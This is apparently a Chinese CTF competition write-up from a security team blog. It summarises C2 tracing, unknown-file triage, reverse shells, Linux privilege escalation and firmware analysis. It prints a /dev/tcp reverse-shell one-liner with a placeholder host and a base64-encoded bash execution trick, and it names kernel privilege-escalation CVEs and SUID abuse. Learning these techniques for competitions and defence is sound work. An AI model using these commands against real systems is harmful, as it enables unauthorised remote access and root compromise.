一、溯源使用了云函数的C2真实IP的思路
该题目是给了一个exe木马,要求获取其连接的真实IP,丢进沙箱发现它使用了云函数来隐藏teamserver:
使用云函数的样本没有特别好的溯源方法,不过也不是完全没机会,依靠网络空间测绘引擎,还是有可能的。
本质上是因为teamserver被网络空间搜索引擎识别到并解析出了beacon配置,其中含有云函数地址,所以可以被搜索到。
该方法有一定的局限性,如果目标服务器修改了默认异或密钥,就无法解析出beacon配置了;如果启用时间不长,搜索引擎没有收录,那也无法找到。
参考这种思路,也可以依据空间搜索引擎的全网扫描结果,结合手动确认,逐步缩小范围,最终定位真实teamserver地址。
二、排查未知文件的思路
这道题目也是比较贴近实战的,在应急响应工作中遇到的未知文件基本离不开木马、黑客工具这个范围,攻击者可能将其进行改名、混淆等,排查其作用的思路为:
1.先利用沙箱进行检测,如果仅修改名称,那么md5值不变,很多黑客工具都被放进沙箱检测过,这样就可以关联到其原始名称
2.放进虚拟机运行一下,某些工具会在帮助信息里输出名称、logo、调试信息等:
3.根据文件中硬编码的一些字符串确定:
三、反弹shell及提权
有道题目无法直接通过 bash -i >& /dev/tcp/ip/port 0>&1 来反弹shell,推测原因:
1.机器不出网
2.命令没成功执行
通过wget能成功访问到本地HTTP服务,排除机器不出网的情况,那么解决命令未成功执行的方法:
1.写入shell文件再执行
2.将命令编码执行:bash -c '{echo,<base64字符>}|{base64,-d}|{bash,-i}'
最终用第一种方法成功反弹。
还遇到了Linux提权相关题目,主要有两大常用思路:漏洞提权及suid提权.
漏洞如:
-
• Dirtycow(CVE-2016-5195)
-
• Dirtypipe(CVE-2022-0847)
-
• pkexec(CVE-2021-4034)
suid提权则使用https://gtfobins.github.io/查找,如该题使用find提权到root读取flag
四、IOT固件分析和串口使用
拿到题目是一个固件,可以使用binwalk直接解包
拿到文件系统进行分析
一开始可以通过使用串口可以进shell,使用SecureCRT工具连接串口,设置波特率115200
遇到串口调试无法拿shell时,可以通过固件重新打包,修改掉etc/passwd文件修改root用户的密码来使用ssh远程连接。
-END-
如果本文对您有帮助,来个点赞、在看就是对我们莫大的鼓励。
推荐关注:
团队全员均持CISP-PTE(注册信息安全专业人员-渗透测试工程师)认证,积极参与着各类网络安全赛事并屡获佳绩,同时多次高水准的完成了国家级、省部级攻防演习活动以及相关重报工作,均得到甲方的一致青睐与肯定。
原文始发于微信公众号(弱口令安全实验室):2023西湖论剑线下决赛的一些小总结
